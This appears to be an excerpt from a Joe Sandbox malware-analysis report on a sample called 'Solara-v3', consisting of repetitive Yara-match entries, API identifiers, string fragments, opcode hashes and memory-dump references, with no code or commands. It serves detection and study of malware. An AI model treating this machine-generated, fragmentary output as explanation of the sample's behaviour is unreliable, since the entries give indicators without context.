                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: mA
                                                                                                                                                                                                                                              • API String ID: 2994545307-377813790
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "C
                                                                                                                                                                                                                                              • API String ID: 0-2206442469
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "C
                                                                                                                                                                                                                                              • API String ID: 0-2206442469
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "C
                                                                                                                                                                                                                                              • API String ID: 0-2206442469
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: XqR
                                                                                                                                                                                                                                              • API String ID: 0-4205905425
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ''
                                                                                                                                                                                                                                              • API String ID: 0-2284169615
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Q R
                                                                                                                                                                                                                                              • API String ID: 0-3646680613
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: EVJ_
                                                                                                                                                                                                                                              • API String ID: 0-352177915
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Nv
                                                                                                                                                                                                                                              • API String ID: 0-2521146493
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: G9
                                                                                                                                                                                                                                              • API String ID: 0-2716091189
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Dkpk
                                                                                                                                                                                                                                              • API String ID: 0-2230318481
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: yJA
                                                                                                                                                                                                                                              • API String ID: 2994545307-2938920004
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: |X|X
                                                                                                                                                                                                                                              • API String ID: 0-2218283020
                                                                                                                                                                                                                                              • Opcode ID: 4e5c2659c129e1988177d5d496e4e7676c33d3dde831d9fe778a2e42bff78039
                                                                                                                                                                                                                                              • Instruction ID: cac40e2581ff872ab27a598a1b45c8296db47ebe279b368b7e4a74499d8b646e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e5c2659c129e1988177d5d496e4e7676c33d3dde831d9fe778a2e42bff78039
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA1190BAE006229BC711CF68CC81BAAF3B1BF49700F025225E959FB360D671ED528794
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: ac21b3154371b9123b6cf7eb29276aeded3cff8d4f0c9c4ebdc798624198afa3
                                                                                                                                                                                                                                              • Instruction ID: eb6c137914190778cc39401c3b1ae89dfde7721dc61adad6eda297e009315b74
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac21b3154371b9123b6cf7eb29276aeded3cff8d4f0c9c4ebdc798624198afa3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F891D2396083119BC728DF18C99192BB3E2FF98710F15953DE9858B361EB35EC16CB85
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 73c5540b047db511690bcec2d5be8477da0bf30420e7a3d2e4d17ab541a095ee
                                                                                                                                                                                                                                              • Instruction ID: fdfd5630cbfef5ef22e4fdbb6b9e2235d5d7d2952f6c86c7509a691c573987a7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73c5540b047db511690bcec2d5be8477da0bf30420e7a3d2e4d17ab541a095ee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0715A72A083618BD3188F25986133BBBD1DFD2704F69886EE4D69B391D7798805CB46
Memory Dump Source
• Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: b1b17e811ad84c02a75428410a430e784aaf74558106e518f534b17a2e8755fd
                                                                                                                                                                                                                                              • Instruction ID: 99dc13c7fbb656e8e593b4c013347aff3b0bffb19504d9c0fb3df3c2b29b5b1a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1b17e811ad84c02a75428410a430e784aaf74558106e518f534b17a2e8755fd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 264133782583009BE7148F14DD81B7BB3A6EBC4314F28453EE285973A0DA79BC218B0A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5c06d3715020c9e906dd8f3ea95b00d607807413e7af719e77faa20cdb60b4cb
                                                                                                                                                                                                                                              • Instruction ID: ea4754be5dd7e8cf826f622dde6b3e998fbc03a804596390a98b67661fe1b0f4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c06d3715020c9e906dd8f3ea95b00d607807413e7af719e77faa20cdb60b4cb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64412579E10221DBDB18CF28E9016AAB3F2FF8A300F159579C845E3755DB385914CB84
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: cff4c8bf935c6f11034f3282e146f2a6c370e0ca8f0a63124d1a240452eb4176
                                                                                                                                                                                                                                              • Instruction ID: 20d5841960d25e88823685a0e503dee0d7ec10e54da16e755c7071827351d428
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cff4c8bf935c6f11034f3282e146f2a6c370e0ca8f0a63124d1a240452eb4176
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20312272A09210AFD710CF19C94476BB3E5EFD8708F05982DE988AB310D3769D06CBCA
Memory Dump Source
• Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                              • Instruction ID: 1294d0705928bf3a89d236d6dca5d2cbcf07529827a8e07e7f8c1353ee7f14bb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F112933A081D04EC312CD3C84005E5BFE31AD7235F5D939AF4B49B2D2D6279D8A8359
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 97718bc0ed5acd2ef67b6ac929bf9cde3530f8ae51658a77dfe51b2ee5937b12
                                                                                                                                                                                                                                              • Instruction ID: 751a0443e18ccd328d4b1c2847a2144c861d21d079d442caefe011fc4f84fbda
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97718bc0ed5acd2ef67b6ac929bf9cde3530f8ae51658a77dfe51b2ee5937b12
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C101B5F1B0031257E7609E11B5C0B27B2A86F84718F49453EE84897745EB7DFC05C29A
Memory Dump Source
• Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00423561
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042365E
Similarity
• API ID: EnvironmentExpandStrings
• String ID: afrf$dfkf$s6B$tfff
• API String ID: 237503144-2388771387
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00428577
Similarity
• API ID: EnvironmentExpandStrings
• String ID: B]C]$B]V]$S%1e$S%1e
• API String ID: 237503144-91396555
                                                                                                                                                                                                                                              • Opcode ID: 7fd0bbd5d6f31a729f27431df120334829b1dedf336d013a1b80b2b09c62a36b
                                                                                                                                                                                                                                              • Instruction ID: 8746a14ed2116129ecf6ab586aa45845e2b2ebc96e851e8bdc8583723b65a5bd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fd0bbd5d6f31a729f27431df120334829b1dedf336d013a1b80b2b09c62a36b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED21057260C3255FE328CF25D8557ABF2E7EFC5700F11C83D95899B2D1DAB08446879A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                              • Opcode ID: a7e015fa189f20fae8a1e1574193bbbed12d41f97909a9eee6515be2d05f634e
                                                                                                                                                                                                                                              • Instruction ID: d2e9c7bdcd16e3a15224797572231dfe0fa3dd802bd302cf10fb2ba368259f32
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7e015fa189f20fae8a1e1574193bbbed12d41f97909a9eee6515be2d05f634e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 723192B49143148FDB00EF68DA85649BBF4BF89304F41852EE898DB360D3B4A958CF86